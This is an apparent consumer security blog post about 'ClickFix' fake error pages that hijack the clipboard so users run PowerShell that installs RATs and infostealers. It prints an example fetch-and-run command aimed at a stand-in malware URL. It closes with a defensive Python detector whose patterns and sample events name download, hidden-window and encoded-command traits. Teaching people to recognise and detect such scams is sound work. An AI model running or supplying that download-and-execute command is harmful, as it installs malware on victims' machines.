The Latest Scam: “Fix Your PC” Pop-Ups That Install Malware

You’re browsing the web when suddenly a pop-up appears. “Critical system error! Press Win + R and paste this command to repair your computer.”

It sounds urgent. It looks legit. And that’s exactly why it’s dangerous.

Security researchers have uncovered a wave of attacks in 2025 where hackers trick users into running malicious commands themselves—no shady downloads or email attachments required. Instead, they hijack your clipboard and convince you to paste and execute malware disguised as a “quick fix.”

This technique, called ClickFix, has become a favorite for cybercriminals spreading remote access trojans (RATs) and password-stealing malware. Here’s what you need to know.

How the Scam Works

  1. You Land on a Fake Error Page

    • Hackers create convincing fake pages mimicking services like DocuSign, Okta, or even Windows error alerts.

    • The message claims your system is corrupted and provides “instructions” to fix it.

  2. Your Clipboard Gets Hijacked

    • Hidden JavaScript on the page silently replaces whatever you copied with a malicious command.

    • You think you’re pasting harmless text, but it’s actually a script that downloads malware.

  3. You Run the Malware Yourself

    • The command often uses PowerShell to fetch and execute a malicious payload.

    • Once run, the malware silently installs itself—giving hackers access to your system.

Example of a Hidden Attack Command

```powershell
powershell.exe -Command "Start-BitsTransfer -Source 'hxxps://fake-site.com/malware.exe' -Destination 'C:\Temp\update.exe'; Start-Process 'C:\Temp\update.exe'"
```

To the victim, it might just look like a system verification step. In reality, it’s a backdoor for malware.

The Malware Being Spread

Security firm Palo Alto Networks has linked ClickFix scams to three major threats:

1. NetSupport RAT: Full Remote Control

  • Disguised as a “Java update” or “security patch.”

  • Once installed, hackers can remotely control your PC, steal files, and spy on your activity.

2. Latrodectus: The Silent Data Thief

  • Often delivered through fake “browser verification” pages.

  • Steals saved passwords, cookies, and credit card details from browsers.

3. Lumma Stealer: AutoIt-Based Infostealer

  • Spreads via typosquatted domains (like “d0cu-sign.com”).

  • Targets cryptocurrency wallets and banking logins.

Why This Scam is So Effective

✔ No Email Attachments = Harder to Detect

  • Traditional email filters can’t stop it because the attack happens in your browser.

✔ Preys on Urgency

  • “Your computer is at risk!” messages pressure users into acting fast.

✔ Bypasses Common Security Tools

  • Since the user runs the command themselves, some antivirus programs don’t flag it.

How to Protect Yourself

Never Run Random Commands: If a website tells you to paste something into PowerShell or Command Prompt, close it.

Check Your Clipboard Before Pasting: Paste into Notepad first to see what you’re actually running.

Use a Password Manager: Helps avoid theft of saved browser passwords.

Keep Software Updated: Many attacks exploit old vulnerabilities.
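For readers on the defending side, here is an added example (not from the original post) of how the "paste this into Win+R" pattern can be spotted in process-creation logs: an interpreter started by explorer.exe whose command line shows two or more traits of a download-and-run payload. The event shape and the sample events are constructed for this example; the first sample reuses the command shown earlier in the article, and the base64 in the second is a placeholder.

```python
from __future__ import annotations
import re
from typing import Iterable

# Interpreters a pasted "fix" usually lands in; the Win+R Run box launches them under explorer.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_DIALOG_PARENT = "explorer.exe"

# Traits of the pasted payload. Each name doubles as the reason reported to the analyst.
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download cmdlet": re.compile(r"Start-BitsTransfer|Invoke-WebRequest|\biwr\b|DownloadString|\bcurl\b", re.I),
    "remote URL": re.compile(r"\b(?:https?|hxxps?)://", re.I),
    "launch of fetched file": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Constructed events in the shape of Sysmon Event ID 1 (parent image, child image, command line).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r'''powershell.exe -Command "Start-BitsTransfer -Source 'hxxps://fake-site.com/malware.exe' -Destination 'C:\Temp\update.exe'; Start-Process 'C:\Temp\update.exe'"'''},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -NoP -w hidden -ec QUFBQUFBQUFBQUFBQUFBQUFBQUFB"},  # placeholder base64
    {"parent": r"C:\Users\alice\AppData\Local\Programs\Code.exe", "image": PS,
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},  # developer tooling, not from the Run box
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -Command Get-Help Invoke-WebRequest"},  # one trait alone is not enough
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return the indicator names that fire for one event; an empty list means not flagged."""
    if basename(event["parent"]) != RUN_DIALOG_PARENT or basename(event["image"]) not in INTERPRETERS:
        return []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    # A single trait (e.g. a URL typed into Run) is noisy; require at least two before flagging.
    return reasons if len(reasons) >= 2 else []

def find_clickfix(events: Iterable[dict]) -> list[tuple[str, list[str]]]:
    """Pair each flagged command line with the reasons it fired."""
    return [(e["cmdline"], r) for e in events if (r := classify(e))]

if __name__ == "__main__":
    for cmdline, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"FLAGGED ({', '.join(reasons)}): {cmdline[:80]}")
```

Running it flags the first two sample events and leaves the developer build, the plain `dir`, and the lone `Get-Help` untouched; tune the indicator list and threshold to your own telemetry.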

Final Warning: Stay Skeptical

Hackers are getting smarter, but their biggest weapon is still human trust. If something seems off, it probably is.

